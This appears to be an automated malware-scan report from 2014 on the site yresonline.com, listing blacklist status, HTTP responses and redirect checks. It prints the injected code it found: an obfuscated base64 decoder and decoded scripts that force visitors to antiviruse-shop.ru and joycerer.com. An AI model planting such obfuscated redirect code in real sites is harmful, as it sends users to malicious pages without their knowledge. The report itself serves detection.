Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=yresonline.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://yresonline.com/ | HTTP/1.1 200 OK Date: Fri, 19 Dec 2014 17:39:21 GMT Accept-Ranges: bytes ETag: "f052a1a1ffdca1:11ba77" Server: Microsoft-IIS/6.0 Content-Length: 3243 Content-Location: http://yresonline.com/default.html Content-Type: text/html Last-Modified: Wed, 26 May 2010 22:02:15 GMT X-Powered-By: ASP.NET | clean |
http://yresonline.com/default.html | 200 OK Content-Length: 3243 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: antiviruse-shop.ru top.location = 'http://antiviruse-shop.ru/'; Decoded script: function () { function bI() { } hJ = ""; var kVQ = "kVQ"; var iG = ""; var eBS = new Array; rA = ""; wE.w(); jY = ""; var hB = "hB"; var iZF = ""; qY = ""; jYG = ""; uK = 30969; var qD = "qD"; } /*** called setTimeout with function () { function bI() { } hJ = ""; var kVQ = "kVQ"; var iG = ""; var eBS = new Array; rA = ""; wE.w(); jY = ""; var hB = "hB"; var iZF = ""; qY = ""; jYG = ""; uK = 30969; var qD = "qD"; }, 326 */ <html ><head ></head><body ></body></html> | ||
http://yresonline.com/test404page.js | 200 OK Content-Length: 24043 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var CRYPT={signature:'BXcfTYewQ',_keyStr:'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',decode:function(input){var output='';var chr1,chr2,chr3;var enc1,enc2,enc3,enc4;var i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i<input.length){enc1=this._keyStr.indexOf(input.charAt(i++));enc2=this._keyStr.indexOf(input.charAt(i++));enc3=this._keyStr.indexOf(input.charAt(i++));enc4=this._keyStr.indexOf(input.charAt(i++));chr1=(e ...[1647 bytes skipped]... Decoded script: document['w9107r9701i6175t2669e92805853'.replace(/[0-9]/g,'')]('<scr'+hVhGWcCBqW+'ipt>top.location=\'http://joycerer.com/red4.php\';</scr'+hVhGWcCBqW+'ipt>'); document['w9107r9701i6175t2669e92805853'.replace(/[0-9]/g,'')]('<scr'+hVhGWcCBqW+'ipt>top.location=\'http://joycerer.com/red4.php\';</scr'+hVhGWcCBqW+'ipt>'); /*** called setTimeout with document['w9107r9701i6175t2669e92805853'.replace(/[0-9]/g,'')]('<scr'+hVhGWcCBqW+'ipt>top.location=\'http://joycerer.com/red4.php\';</scr'+hVhGWcCBqW+'ipt>');, 273 */ top.location='http://joycerer.com/red4.php'; Antivirus reports:
| ||
http://m.welcomeperutravel.com/contact/smfolder.php | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
http://m.welcomeperutravel.com//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js/ | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
http://m.welcomeperutravel.com/test404page.js | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: yresonline.com
Result:
HTTP/1.1 200 OK
Date: Fri, 19 Dec 2014 17:39:21 GMT
Accept-Ranges: bytes
ETag: "f052a1a1ffdca1:11ba77"
Server: Microsoft-IIS/6.0
Content-Length: 3243
Content-Location: http://yresonline.com/default.html
Content-Type: text/html
Last-Modified: Wed, 26 May 2010 22:02:15 GMT
X-Powered-By: ASP.NET
...3243 bytes of data.
GET / HTTP/1.1
Host: yresonline.com
Result:
HTTP/1.1 200 OK
Date: Fri, 19 Dec 2014 17:39:21 GMT
Accept-Ranges: bytes
ETag: "f052a1a1ffdca1:11ba77"
Server: Microsoft-IIS/6.0
Content-Length: 3243
Content-Location: http://yresonline.com/default.html
Content-Type: text/html
Last-Modified: Wed, 26 May 2010 22:02:15 GMT
X-Powered-By: ASP.NET
...3243 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: yresonline.com
Referer: http://www.google.com/search?q=yresonline.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: yresonline.com
Referer: http://www.google.com/search?q=yresonline.com
Result:
The result is similar to the first query. There are no suspicious redirects found.